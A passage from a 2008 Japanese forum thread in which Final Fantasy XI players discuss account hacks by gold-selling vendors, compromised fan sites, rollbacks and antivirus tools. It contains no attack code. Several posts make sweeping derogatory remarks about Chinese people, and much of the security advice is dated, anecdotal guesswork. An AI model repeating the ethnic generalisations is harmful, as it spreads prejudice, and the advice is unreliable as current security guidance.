日本はネット関連の処罰法がまったく整ってないから、こっちのほうがやりやすいはず
831既にその名前は使われています:2008/09/22(月) 00:41:10 ID:Ru8FyPGa
用語辞典くそ重い
このご時世だからもう何もかもこえー
832既にその名前は使われています:2008/09/22(月) 00:48:29 ID:UpKzgIhf
そういや不正アクセスがアメリカからだった場合、
日本の警察に被害届出せば、犯人逮捕される可能性ってあるんかな?
833既にその名前は使われています:2008/09/22(月) 00:57:25 ID:vQ9En+cr
>>832
どうせ中継だけだから無理でしょ
834既にその名前は使われています:2008/09/22(月) 01:22:31 ID:FYwlFwav
>>832
結果がどうあれ警察に届け出は必要でしょ。
835既にその名前は使われています:2008/09/22(月) 02:27:16 ID:VGYOoWlK
215からあげ
836既にその名前は使われています:2008/09/22(月) 04:34:58 ID:vQ9En+cr
203からあげ
837既にその名前は使われています:2008/09/22(月) 08:59:24 ID:5eVFCYEw
age
838既にその名前は使われています:2008/09/22(月) 10:46:15 ID:Nc252uVF
アメリカには日本よりスーパーハカーが居てなんとかしてくれるはず
839既にその名前は使われています:2008/09/22(月) 11:53:31 ID:EYmmg+9B
普段PS2オンリーで連休で実家のPCでやってたらやられたわ・・・
セキュリティざるだったので自業自得だが
6年間積み上げてきた物が1日でボロクソにされるのはきついな・・・
とりあえず新パスにしてもらったが
支払い方法がwebマネからクレカに、全キャラ鯖移転させられてたっぽい
支払い方法は治してくれるみたいだけど、
キャラはもう巻き戻し申し込むしかないよなあ
キャラ名被ってて変えなきゃいけなくなってたら鬱だ
840既にその名前は使われています:2008/09/22(月) 12:14:48 ID:siUjfnpr
最近中華の爆撃をあまり見ないと思ったら、どうもアラド方面に進出しているようだ。
パクリブログもアラドブログのパクリだったりするし。

見つけた福建中華のパクリブログ
ttp://yaplog■jp/aradsummon/

プロフィール欄下部にinfosueekの幅30、高さ0のIFRAME。

タイトルとプロフィール欄、記事本文を別々のFC2ブログにあるアラドブログからパクっている。
タイトルはタイトルを検索すれば出てくる。
記事はちょっと長いが以下を検索すると一発で出てくる。
”知能による火力を夢見て、適当にノース知能布を揃えてみました。現在の街での知力が618、ララミスが発動すると700越します。”

気をつけてくれよな!
841既にその名前は使われています:2008/09/22(月) 12:52:29 ID:GVQz/btR
コマンドプロンプトに
(*´Д`)ハァハァ
をコピーして貼り付けてENTER。
842既にその名前は使われています:2008/09/22(月) 12:56:23 ID:7WFrQLWR
843既にその名前は使われています:2008/09/22(月) 13:21:25 ID:AqP0Ab4p
米ユーザーターゲットとかサイバー戦争勃発ですがな
844既にその名前は使われています:2008/09/22(月) 13:34:48 ID:sPZlyQQx
JPがやられ放題で、中の国に何もしてこないって事に味締めて、
市場の大きい米をターゲットにすればもっとうまぁwって思っちゃったのね

米がどういう国か知らない連中がやってるんだろうね
845既にその名前は使われています:2008/09/22(月) 15:30:03 ID:pt4h2p0f
239agu
846839:2008/09/22(月) 16:27:34 ID:Y80UH8sm
ゲームデータの復元を依頼したんだが
これ結構巻き戻されるんだよな?
垢ハックされる前日にタイダルタリスマンを
ゲーム内で受け取ってるんだがオワタっぽい?

5000円払って残ったのはウンコアクセサリーだけかよww
847既にその名前は使われています:2008/09/22(月) 16:35:50 ID:e+n11Cgg
先に伝えておけばなんとかしてくれるかもしれんしGMでもよんでみたら?
だめなら諦めるだけだなw
848既にその名前は使われています:2008/09/22(月) 16:38:45 ID:82t0HMa3
>>846
ん〜どうなんだろ。スクエニもそこまで想定していないと思うので
GMやサポセンに掛け合ってぜひ前例作ってくれ。
849既にその名前は使われています:2008/09/22(月) 16:49:28 ID:VFrBHiLv
同じアカが二回やられたケースってある?
850既にその名前は使われています:2008/09/22(月) 16:50:01 ID:z4afl7R9
ある
851既にその名前は使われています:2008/09/22(月) 17:06:44 ID:VFrBHiLv
こわいなー
852既にその名前は使われています:2008/09/22(月) 17:13:33 ID:6ri1VPRi
なんかキャラ選択画面で全画面モードを失ったとかエラーが出た。
垢ハックはPOLログインの時に落ちるんだっけ?
853839:2008/09/22(月) 17:25:57 ID:Y80UH8sm
チャットサービスで聞いて来たぜw

やはり基本的にアイテム補償はやらないってことみたいだけど
一応もしインゲームアイテムなくなってたらGMに問い合わせてくれとのこと。
アイテム救済措置の方でいけるかも
ついでにいつくらいのデータに巻き戻るのよ?って聞いたけど教えてくれなかった。
一応垢ハックされたのがわかった直前のデータとは言ってたけど怪しいなw
854既にその名前は使われています:2008/09/22(月) 17:40:08 ID:91l0G81R
私はハック受ける一日前に巻き戻しでした。
NM倒してアイテム取ってたのに、張り込みしている時の状態だった。
855839:2008/09/22(月) 17:48:10 ID:Y80UH8sm
お、じゃあ運が良ければいけそうか?
一応送付書類にも不正アクセス受けた日時かなり正確に書いといた
856既にその名前は使われています:2008/09/22(月) 17:50:29 ID:id/qzxBW
元締はロシア、アメリカで労働者が中国等アジア。
ターゲットは日本、韓国、アメリカ、ドイツ。
でOK?
857既にその名前は使われています:2008/09/22(月) 18:13:49 ID:VFrBHiLv
何人くらい被害が出たとか数字出てないの?
858既にその名前は使われています:2008/09/22(月) 18:18:56 ID:Nc252uVF
■eしか知りえない情報だし、■eは開示する気無いからな。
859既にその名前は使われています:2008/09/22(月) 19:11:49 ID:4CN1VSIy
そんな■的に不利な情報開示する訳が無い
860既にその名前は使われています:2008/09/22(月) 19:45:38 ID:ek+j7OI3
DB調べなきゃわからんての
861既にその名前は使われています:2008/09/22(月) 19:53:09 ID:thKm4rhT
スレチだが中華すげえな
ttp://www.yomiuri.co.jp/atmoney/news/20080919-OYT1T00011.htm
こんなもん絶対中国企業にソース流れるだろうし
そうなると勝手に国内の製品に他国のセキュリティー技術取り込んだり
他国製品の攻撃が可能になるよな
もう、ハッキング国家って言っていいな
862既にその名前は使われています:2008/09/22(月) 19:54:39 ID:XYytP5i+
食品関係でもそうだけれど
中華のやる事なす事信じられない。
863既にその名前は使われています:2008/09/22(月) 19:55:16 ID:DqUFUKK2
スレチってわかってるのに貼るバカ
864既にその名前は使われています:2008/09/22(月) 19:57:40 ID:82t0HMa3
売らなきゃいいだけだしな。
最初からソース公開されてるLinux+Firefoxとかいいんじゃねーの?
865既にその名前は使われています:2008/09/22(月) 21:06:16 ID:82t0HMa3
216age
866既にその名前は使われています:2008/09/22(月) 21:06:46 ID:82t0HMa3
ってsageチェック外れてなかった
867既にその名前は使われています:2008/09/22(月) 21:09:16 ID:ek+j7OI3
>>861
リンクは踏みたくないが
国内販売するIT製品のソースコード全部晒せってやつかな?
いいんでない
自国にはコピー技術しかないことが痛いほど判明するだろw
868既にその名前は使われています:2008/09/22(月) 21:14:28 ID:+FG5FZBD
>>857
国内だけなら週間で問い合わせ人数が数百人
認定された人数はちょっと判らん。
869既にその名前は使われています:2008/09/22(月) 23:17:08 ID:rDipaBrJ
250フライドチキン
870既にその名前は使われています:2008/09/22(月) 23:17:48 ID:PBGJqUqz
age
871既にその名前は使われています:2008/09/23(火) 00:06:37 ID:zWGEhuxf
強制終了の症状なのですが、最近
FFからログアウト→POLからメッセージ作成中
文章を打って何度かEnterキーで確定すると落ちるようになりました。
キーロガーを防止するフリーソフト、Nologgerを導入したところ
その症状は治りました。
これ、やられてますかね・・・?今のところ実害はないのですが。
(POLのログインはソフトウェアキーボードを使っています。)
872既にその名前は使われています:2008/09/23(火) 00:55:58 ID:F/4gSRY+
おやすみ前のあげ
873既にその名前は使われています:2008/09/23(火) 00:56:12 ID:l+eha6ts
>>839
戻ってきたときに名前変わるの嫌なら、
別アカがあるならその名前を確保しとくとか、
ないなら親しいフレにメインキャラの名前だけ確保しといてもらえ。
そうすりゃ戻ってきたときに、確保しといたキャラ削除で元の名前使える。
874既にその名前は使われています:2008/09/23(火) 02:10:25 ID:cfwbkyVE
875既にその名前は使われています:2008/09/23(火) 02:35:59 ID:1kgexk31
876既にその名前は使われています:2008/09/23(火) 02:36:35 ID:tDWc3YNk
877既にその名前は使われています:2008/09/23(火) 02:37:13 ID:rWQYgeqf
878既にその名前は使われています:2008/09/23(火) 03:30:02 ID:teiLMd4Q
879既にその名前は使われています:2008/09/23(火) 03:59:33 ID:3iu82t+p
880既にその名前は使われています:2008/09/23(火) 04:06:44 ID:+yw5idfe
881既にその名前は使われています:2008/09/23(火) 04:13:03 ID:qAVCpxjo
882既にその名前は使われています:2008/09/23(火) 04:14:18 ID:d7vKlaHg
はらへった
883既にその名前は使われています:2008/09/23(火) 04:50:06 ID:tb0p3FBa
884既にその名前は使われています:2008/09/23(火) 05:45:05 ID:+WxZZbGl
885既にその名前は使われています:2008/09/23(火) 05:59:38 ID:Dd9LmS+6
886既にその名前は使われています:2008/09/23(火) 07:33:08 ID:vVchXBEn
887既にその名前は使われています:2008/09/23(火) 07:33:48 ID:duCkt7TY
888既にその名前は使われています:2008/09/23(火) 09:34:45 ID:XIFXo8sc
889既にその名前は使われています:2008/09/23(火) 09:44:05 ID:8zb2yrNw
やだ・・・何この流れ・・・
890既にその名前は使われています:2008/09/23(火) 10:21:31 ID:81A7AHmG
獣使いwikiでFF11マップガイド(ネット便利)が危険って書いてあるけど、
これまだ危険なの?
つい最近見ちゃったけど何とも無い
Noscript入れといて良かったわ
ヴァナMAPが無くなってから地図サイト困ってるんだよなぁ
891既にその名前は使われています:2008/09/23(火) 10:28:15 ID:n5hvIAsJ
>>890 ネット便利さんは改ざんの直後 レンタルサーバを引っ越し済み
黒魔メモさんも改ざん部分は対応済みですから
現状どちらも大ジョブだと思いますよ。
892既にその名前は使われています:2008/09/23(火) 10:29:51 ID:ovQ23Rjo
>最近見ちゃったけど何とも無い

安全・危険は業者の気分次第・管理側のセキュリティで変動するから絶対安全ってものはないし。

現在安全かどうかは知らないが、ハックするストックが多くて順番まち状態かも知れないのにこの考え方は危険じゃね。
893既にその名前は使われています:2008/09/23(火) 10:30:42 ID:ovQ23Rjo
スマンうっかり行間あいてる・・・
894既にその名前は使われています:2008/09/23(火) 10:53:36 ID:7JBeCaiP
>>890
Noscript入れてたならわかると思うけど
反応しなければ改竄されてないってことだべw
895既にその名前は使われています:2008/09/23(火) 11:16:46 ID:81A7AHmG
おーそうか
逆に獣wikiが情報更新するの放置してるってことだなw
フレの多数がネット便利使ってるはずだから心配だったが安心したぜ
皆あんがとなー
896既にその名前は使われています:2008/09/23(火) 12:44:58 ID:+hEvZWa/
polhook.dllって何ですか?

XPの時計つついたらカスペルが、
新規または修正モジュールがなんたらかんたらで
polhook.dllの変更を許可するか?ってメッセージが出てきたんだけど・・・。
897既にその名前は使われています:2008/09/23(火) 13:28:44 ID:8JJFJtK/
一回改竄されたことのあるHPだし、たとえ今安全でも今後どの瞬間に改竄されるかもわからない

ってことを念頭に置いて閲覧しろよ
898既にその名前は使われています:2008/09/23(火) 13:49:28 ID:+WxZZbGl
>>896
スクエニが忍ばせたアレです
899既にその名前は使われています:2008/09/23(火) 14:17:22 ID:XjdYoqJo
>>895
正直スマンカッタ
ネット便利と黒魔メモも対応済みにしました
900既にその名前は使われています:2008/09/23(火) 14:29:01 ID:qKETor0V
チャットサービスで巻き戻し1~2 週間かかると言われたけどそれ以上とみたほうがいい?
901既にその名前は使われています:2008/09/23(火) 16:12:23 ID:45YCIkJl
902既にその名前は使われています:2008/09/23(火) 16:27:07 ID:MXYLWNEC
>>900
> チャットサービスで巻き戻し1~2 週間かかると言われたけどそれ以上とみたほうがいい?
一般企業なら10日前後と受け取っていいが
スクエニなので+一週間はみなさい
903既にその名前は使われています:2008/09/23(火) 18:34:29 ID:BHpBTJFY
保守
904既にその名前は使われています:2008/09/23(火) 18:44:31 ID:qKETor0V
てことは3週間か。
巻き戻しサービスあるだけましか。
905既にその名前は使われています:2008/09/23(火) 19:06:04 ID:xQxmE3KC
906既にその名前は使われています:2008/09/23(火) 19:08:09 ID:bCHS+vQc
今までの話からすると、1〜2週間も巻き戻ってるほうがまれ
オレの場合数時間前だった
907既にその名前は使われています:2008/09/23(火) 19:09:00 ID:bCHS+vQc
ああ、巻き戻しにかかる期間か
忘れてくれ orz
908既にその名前は使われています:2008/09/23(火) 21:26:13 ID:UXOSanwY
最近はだいぶ落ち着いてきたのかね?
一時期定時集合系コンテンツ行く度に誰かが引っかかってたが最近は聞かなくなった
909既にその名前は使われています:2008/09/23(火) 21:33:20 ID:3ppZqjM5
ヤフオクの垢つー金蔓に注力し始めたんじゃないのか
910既にその名前は使われています:2008/09/23(火) 22:19:01 ID:YY+cip2S
一瞬の油断が命取り
911既にその名前は使われています:2008/09/23(火) 23:59:39 ID:VzURTp+m
ほす
912既にその名前は使われています:2008/09/24(水) 00:52:00 ID:Ek2YrNmf
FF11WARNING管理人です。連絡と提案です。
topページだけ見て帰ったようですが9/21の生ログでmiku.xrea.jp/template/に
proxy1.square-enix.co.jp からのアクセスがありました。
リファラがime.nuで、つまりこのスレからとんできてました!
個人としてか組織としてかはわかりませんが
少なくともスクエニ社内からこのスレをチェックしているようです。
(imenu経由のスクエニのアクセスログは初めてみましたw)

当方はスレを参考にさせていただいていますし 情報収集もさせていただいていますが
スレの内容であっても当方で扱わない話題も多々ありますしスレ維持に携わっているわけでもありません。
このまま状況が落ち着くようであれば、
以前にも話題になっていた「スレのまとめサイト」を作ることを提案します。
スレの性質上管理運用の問題がどうしても避けて通れない問題ですので
必要であれば出すぎたことではありますが軌道に乗るまでの管理運営は当方で行ってもかまいません。
その辺のご検討ご意見をいただければと思います。
スレにはお世話になってるのでコピペでも情報を蓄積できればいいなぁ、なんて考えたわけです。

まとめなんて必要ないぜ(*´Д`*)ハァハァであればスルーしといてください。私も忘れますw
書き逃げになりますが寝ます。おやすみなさい。
913既にその名前は使われています:2008/09/24(水) 01:00:06 ID:eCsRlsou
結構前のことかもしれないが、業者のサイト潰したスーパーハカーいなかったっけ?
あんな人に活躍して欲しいな・・・。
914既にその名前は使われています:2008/09/24(水) 02:15:35 ID:Mvuti9AG
>>912
まとめサイトのご提案、否はありません
このスレとしてもFF11WARNINGさんへの誘導を多々行っていますので
作っていただければ嬉しい限りだと思います
ただ、ジオであれば安全であるとは申せませんが、できればミラーの
ほうにも載せていただけると嬉しいです
915既にその名前は使われています:2008/09/24(水) 02:19:51 ID:zo6xJ05D
別事案の垢ハック事案でもジャンプ元がここで
足跡残しまくりだから
■は昔から体質は変わっていない
916既にその名前は使われています:2008/09/24(水) 04:15:34 ID:Mvuti9AG
216からシュシュ
917既にその名前は使われています:2008/09/24(水) 05:57:11 ID:yhhAA3vm
お早うのシュシュ
918既にその名前は使われています:2008/09/24(水) 07:13:23 ID:dCT6ndf1
本気age
919既にその名前は使われています:2008/09/24(水) 08:27:14 ID:0OycixaT
>>912
結局プレミアサイトなんて必要はなかったんだよな。
920既にその名前は使われています:2008/09/24(水) 10:22:32 ID:VP1b5tV+
Firefox3.0.2揚げ
921既にその名前は使われています:2008/09/24(水) 12:27:52 ID:LUwLcWdK
RMT関係を本気でアカバンすると
売り手と買い手で相当数が解約になって
ゲームなりたたなくなるんじゃね?w

それが怖くて■の対応鈍いんじゃないかと勝手に想像
922既にその名前は使われています:2008/09/24(水) 12:38:21 ID:hbj5mEPU
よくも悪くもRMTあるから続けてるってのもあるね
売って引退できなきゃとっくに辞めてるかな
923既にその名前は使われています:2008/09/24(水) 12:44:59 ID:AIJeKsqx
初期組からしてみりゃRMTなんて要らん。いわゆる『必要悪』なんかでない。必要ない悪なんだ。
RMTのない頃は、皆それなりに目的持ってコツコツ金貯めてた。
それをRMTと業者が超インフレ引き起こして、頑張ってもどうにもならない世界にしたんだ

RMTないと続けていけない奴は業者と一緒に辞めればいい
924既にその名前は使われています:2008/09/24(水) 12:49:15 ID:V1dMZG+a
金策潰されたのは業者が24時間稼動で素材乱獲・釣り上げ・NM独占したからだしな。
そしてRMTerにギル売って、その利益で垢ハック開発。
もちろん、垢ハックは業者のお客様であるRMTerも対象外ではございません。
925既にその名前は使われています:2008/09/24(水) 13:20:34 ID:02TC7Zxv
>>922
なら、結局時給いくらでFF11何年やってたか計算してみ?w
926既にその名前は使われています:2008/09/24(水) 13:31:47 ID:15q2Gggd
今は垢で検索するとタル♀スレも引っ掛かるんだよなぁ
927既にその名前は使われています:2008/09/24(水) 13:33:59 ID:kR1AEZV1
タル♀NGスレッドにいれろw
928既にその名前は使われています:2008/09/24(水) 13:52:34 ID:zdmIbLTt
今の給料のまま中国行ったら、田舎じゃ豪邸に住めるよ
929既にその名前は使われています:2008/09/24(水) 14:01:27 ID:iFK1UQtK
>>923-924
でもちゃんと運営がそれに対応していけていれば
インフレ等起こさずに済んだんだよね

■の対応の悪さも大きな要因だと思うよ
930既にその名前は使われています:2008/09/24(水) 14:50:15 ID:duSqV/c/
212からあげ
931既にその名前は使われています:2008/09/24(水) 14:56:10 ID:79mS7vzp
ここ2日くらい決まった時間に、PG2が何かをブロックしてる。
先々週も似たようなことあってスキャンしたんだけど、何も出てこないし、被害もなし。
ソフトのアップデート先がブロック対象国だったりするから、それなのかなあ。
こういう被害が増えてくると、安全かどうか見極めがつかなくておっかないね。
932既にその名前は使われています:2008/09/24(水) 15:02:32 ID:qhNFcDY4
>>931
IPからある程度調べられるから、確認してから許可汁
933既にその名前は使われています:2008/09/24(水) 15:52:11 ID:qlmWUKb/
AH久しぶりに覗いたらすげぇ勢いで香港IPはじきまくってたから注意してくれよな
934既にその名前は使われています:2008/09/24(水) 16:00:28 ID:eVaAL+9s
みるなよw
935既にその名前は使われています:2008/09/24(水) 16:04:31 ID:79mS7vzp
>>932
先々週のも今回のも、IP調べたら大学と出ました。
踏み台にされてて元が業者だろうからやられたなと思ったんだけど、3種類のソフトでスキャン
したんだけど、何も出てきてません。
今のところ被害がないので、余計に怖いです。
936既にその名前は使われています:2008/09/24(水) 16:47:27 ID:hbj5mEPU
>>925
現実の稼ぎに換算したらだれもやらんよ
937既にその名前は使われています:2008/09/24(水) 16:58:40 ID:cCOs+p+4
「Firefox 3.0.2」公開、5件の脆弱性を修正
http://internet.watch.impress.co.jp/cda/news/2008/09/24/20933.html
938既にその名前は使われています:2008/09/24(水) 16:59:26 ID:cCOs+p+4
>また、Firefox 2についても、脆弱性などを修正した「Firefox 2.0.0.17」をリリースした。Firefox 2.0.0.17では、Firefox 3.0.2と同様の脆弱性を含む合計9件の脆弱性を修正している。
939既にその名前は使われています:2008/09/24(水) 17:43:29 ID:8uIW4Fmy
まだFx2出すのか…もう切れよ
940既にその名前は使われています:2008/09/24(水) 17:45:38 ID:jYhseEZg
あと3ヶ月の命なんだから勘弁したれ
941既にその名前は使われています:2008/09/24(水) 19:01:32 ID:jYhseEZg
213
942既にその名前は使われています:2008/09/24(水) 20:30:51 ID:dkukcpch
POLシャットダウン時にエラー
マシンシャットダウン時に時間がかかる
この2つの現象が起きたのでカスペでスキャンしたが何も検出されず

心あたりは昨日間違えて白地図本舗開いたくらい
ブサウザはオペラでP2Gが何かブロックしてる形跡は今のところ無し
これはまずいでしょうか?
943既にその名前は使われています:2008/09/24(水) 20:34:59 ID:CCb6+GH6
hostsファイルを一週間に一度手動で更新してるんだけど、
Spybot-S&Dのhosts更新と合わせると凄まじい行数になるね
個人的にJ-word関連も登録してるけど
944既にその名前は使われています:2008/09/24(水) 20:35:23 ID:hbj5mEPU
後悔する前にパス変えて
レジストリ見といたほうがいいんでない
945既にその名前は使われています:2008/09/24(水) 20:47:13 ID:dkukcpch
wなんとかの方はレジストリ検索しても無かったです
他のはまだ見ていないので帰宅したら試してみます
946既にその名前は使われています:2008/09/24(水) 21:33:47 ID:qhNFcDY4
>>942
POLのほうは怪しいけど、PG2使ってるとWINDOWSのシャットダウンが遅くなることがある
一度PG2を手動で終了させてからシャットダウンしてみ
947既にその名前は使われています:2008/09/24(水) 22:27:16 ID:viNTHcJr
Firefox 3.0.2 age
948942:2008/09/24(水) 23:29:15 ID:Tw1OQ2Nz
>>944 >>946 ありがとうございます
帰宅したので3種ともレジストリ検索しましたが見つからず
パスワードを変えて動向を伺う事にします
949既にその名前は使われています:2008/09/24(水) 23:47:56 ID:qhNFcDY4
200↑
950既にその名前は使われています:2008/09/25(木) 00:07:57 ID:OL3NEHb7
おやすみ前のあげ。
951既にその名前は使われています:2008/09/25(木) 01:47:49 ID:sayLKFZE
「無料のノートン」広告で偽ソフト配布先に誘導、英Sophosが警告
http://internet.watch.impress.co.jp/cda/news/2008/09/24/20940.html
952既にその名前は使われています:2008/09/25(木) 01:58:08 ID:04jl2VNQ
先日アカハックされたんだが、LSコミュからパス抜かれたりするの?
全くの素人でどこでやられたか検討が…
953既にその名前は使われています:2008/09/25(木) 02:19:07 ID:IflnUyKr
キミはLSコミュにどうやってログインするんだい?
954既にその名前は使われています:2008/09/25(木) 02:21:07 ID:IflnUyKr
つか最近はやったのはどこでやられたのかわからない系だから
キミみたいなのがハックされてもなんの不思議も無い

とりあえず>>1見てテンプレで報告してくれたらありがたい
955既にその名前は使われています:2008/09/25(木) 02:21:35 ID:ibBNqA1U
>>928
豪邸建設中に殺されて金奪われる
956既にその名前は使われています:2008/09/25(木) 03:00:06 ID:iT1BwDEC
ウイルスセキュリティゼロでスキャンかけたらTrojan.Win32.Agent.DOXNとかいうのがでてきた。
ぐぐっても一致する情報がでないし、これなんぞ・・・
957既にその名前は使われています:2008/09/25(木) 03:10:23 ID:iXIQwalK
>>956
@nifty ウイルスチェックサービス(無料)で調てみるよろし
ttp://www.nifty.com/security/vcheck/
958既にその名前は使われています:2008/09/25(木) 03:17:38 ID:iT1BwDEC
>>957
ありがとう、まだスキャン中なので終わったらそちらでもやってみる。
959既にその名前は使われています:2008/09/25(木) 03:23:32 ID:yrLjKRZH
まあ、カペルは正規プログラムでもブロック(マイクロソフトの正規プログラムでもウイルス判定だしたw)するからなー
複数のオンラインスキャンもして、何もなかったら取り敢えず大丈夫?かなって程度。
960既にその名前は使われています:2008/09/25(木) 03:54:41 ID:iT1BwDEC
スキャン完了、ニフティでは何も検出されず。(ゼロで駆除した後だからでてきても困るが)
今日はもう遅いので明日カスペでもかけてみよう・・・
961既にその名前は使われています:2008/09/25(木) 04:47:40 ID:F5E1o360
ウィルス(に対しての)セキュリティ(が)ゼロ
962既にその名前は使われています:2008/09/25(木) 09:15:40 ID:JSnoXGg0
本気でウィルスセキュリティ0つかってるやついたのかw
マジで安かろう悪かろうを地でいくソフトだぞw
963既にその名前は使われています:2008/09/25(木) 11:02:14 ID:1Ic6ACnb
あぐ
964既にその名前は使われています:2008/09/25(木) 11:18:16 ID:7P/6hAsc
カスペ2009の無償バージョンアップのお知らせが来たわけだが
今安定して動いてるものにいれるのはちょっと躊躇するなぁ。
965既にその名前は使われています:2008/09/25(木) 11:42:22 ID:yrLjKRZH
ゼロはなー。
悪いって訳じゃないけど、
「ゆっくりしていってね!」系の週一でネットに繋げる人用のウイルスソフトだからなー(と、俺の中での位置付け)
ネトゲするような人には向いてないよなー。あのソフト。
966既にその名前は使われています:2008/09/25(木) 12:27:28 ID:sayLKFZE
>>964
3ヶ月から半年ぐらいしてソフトがこなれてからの方がいいと思う。
別にすぐバージョンアップしないとパターンファイルやらが更新されないって言う事が無い限りには
967既にその名前は使われています:2008/09/25(木) 14:40:16 ID:9wrHarCg
今日ノートンでTrojan.ByteVerifyってのが引っかかりました
駆除してパス変えたけどこれが垢ハックのウイルスかも
968既にその名前は使われています:2008/09/25(木) 14:51:30 ID:AlVb+AUx
MS03-011の虚弱性って何年前のウイルスですかw
969既にその名前は使われています:2008/09/25(木) 14:56:02 ID:GCfQ6hR2
970既にその名前は使われています:2008/09/25(木) 15:01:18 ID:3+zTmnxM
>>969
>>967はスケベさん、ッて事?
971既にその名前は使われています:2008/09/25(木) 15:04:27 ID:GCfQ6hR2
>>970
いえ、そういうつもりで出したわけではありません
駆除方法がけっこうやっかいなので、このページは見たのかな?と
思って出しただけです
972既にその名前は使われています:2008/09/25(木) 16:49:18 ID:tM+feruE
>>968
つられてやるクマー

× 虚弱性(きょじゃくせい)
○ 脆弱性(ぜいじゃくせい)
973既にその名前は使われています:2008/09/25(木) 16:50:29 ID:gm2XoDPh
虚弱性wwwwwwww
これはひどいwwwww
974既にその名前は使われています:2008/09/25(木) 18:02:26 ID:DQ/51Pn6
Vana'diel Wiki World Map Guide
//ffxi.logue.be/

aguseで確認したらURLは存在しないと出たのですがページは存在してます。
お気に入り整理でうっかり踏んじゃったのですがここって大丈夫でしょうか?
テンプレの鑑定スレは数日レスがついてないし、既に巻き戻し使っちゃってるので次がないため
不安なのでスレチ承知で伺いに来ました。

ブラウザはfirefox3.0+NoScriptです。
975既にその名前は使われています:2008/09/25(木) 19:03:40 ID:1Ic6ACnb
>>974
携帯からなので簡略に。ほぼ同じ環境で18時50分ごろ踏んだ限りは無問題だった
どの瞬間に改竄されるか分からないから974が大丈夫とまでは言い切れないけどね。
あと火狐は3.0.2にしておきなよ。

ってかいつのまにかほぼ全鯖で規制食らってて俺の怒りが有頂天
976既にその名前は使われています:2008/09/25(木) 19:17:57 ID:DQ/51Pn6
>>975さん
ありがとー!
ノートン、ニフティ、カスペで何も出なかったので大丈夫かなとは思ったのですが
本当に不安で仕方なかったのです、大分安心しました。

私も規制食らってるらしく携帯からでした。
本当にありがとう、火狐は早速3.0.2にいたします。
977既にその名前は使われています:2008/09/25(木) 19:22:11 ID:cBmZZ5+P
カスペが8.0になってファイアウォール設定がかなりわかりにくくなったな

978既にその名前は使われています:2008/09/25(木) 19:35:52 ID:cHuWMkyb
それほどでもない
979既にその名前は使われています:2008/09/25(木) 20:40:40 ID:IVh6iRoV
カスペ2009にしたら、POL.exeがキーロガー反応しまくりだ
どうしたものか
980既にその名前は使われています:2008/09/25(木) 20:44:32 ID:cBmZZ5+P
ステータスの項目から除外でOK
981既にその名前は使われています:2008/09/25(木) 20:52:18 ID:IVh6iRoV
ただの誤検出なのかなあ
スキャンしても問題なかったけども
982既にその名前は使われています:2008/09/25(木) 21:32:52 ID:MFgTlGJp
age-ume
983既にその名前は使われています:2008/09/25(木) 21:35:58 ID:YFwcpSCb
後検出っていうか設定ガチガチにしすぎるとネットに送受信するだけで感知されるぞカスペ
984既にその名前は使われています:2008/09/25(木) 22:03:55 ID:f07u3sI2
規約違反行為者への一斉対処について (9/25)
ttp://www.playonline.com/ff11/polnews/news14403.shtml

スペシャルタスクチームレポート (2008/09/25)
ttp://www.playonline.com/pcd/topics/ff11/detail/3704/detail.html
985既にその名前は使われています:2008/09/25(木) 22:11:13 ID:PbwGcKWu
有料αのカスペ8にした奴がいるとは・・・
流石に乙としか言いようがないですが何故もう少し待てんのだ
986839:2008/09/25(木) 22:21:39 ID:y4lJHErx
>>984
不正アクセスのことがほとんどだな
やっぱ急増してるのか
自衛汁ばっかりでもうちょい具体的な対策立てられんのかね
2度喰らったら実質引退コースだし

そもそも■eは警察に被害届とか出してんの?
法的に抑止力行使しないと絶対減らないだろ
987既にその名前は使われています:2008/09/25(木) 22:22:48 ID:y4lJHErx
名前残ってたw
データ復元早くやってくれww
988既にその名前は使われています:2008/09/25(木) 22:26:16 ID:GCfQ6hR2
次スレ

●● RMT業者の垢ハックが多発している件40 ●●
http://changi.2ch.net/test/read.cgi/ogame/1222348979/l50
989既にその名前は使われています:2008/09/25(木) 22:27:43 ID:PbwGcKWu
>>986
有料で対応してもいいかもな。
だが一人数万円の費用になると思うけどどうだろか?
警察への被害届は毎回出しているみたいだよ

現行の法ではどうにもならんってことらしいけど、抑止効果が出てきたら抑止が効かな方向に逃げるだけだから
長期的に見ると意味ないんだよね。どんな犯罪でも同じだけどね。
まずやるべきは犯罪が起きてからの対応じゃなくてスクエニ側の犯罪が起きにくくする対策なんだろうけど、一番効果があるのが競売。競売停止したらゲーム変わってしまうだろうか?
990既にその名前は使われています:2008/09/25(木) 22:30:07 ID:GCfQ6hR2
>>986
法的抑止力になりえるものが存在しないから問題なのです
せいぜいできることは、国内の中継ポイントを潰すことくらいです
991既にその名前は使われています
ウィルスセキュリティーゼロで、ハック前後検疫したけど、反応なし。。。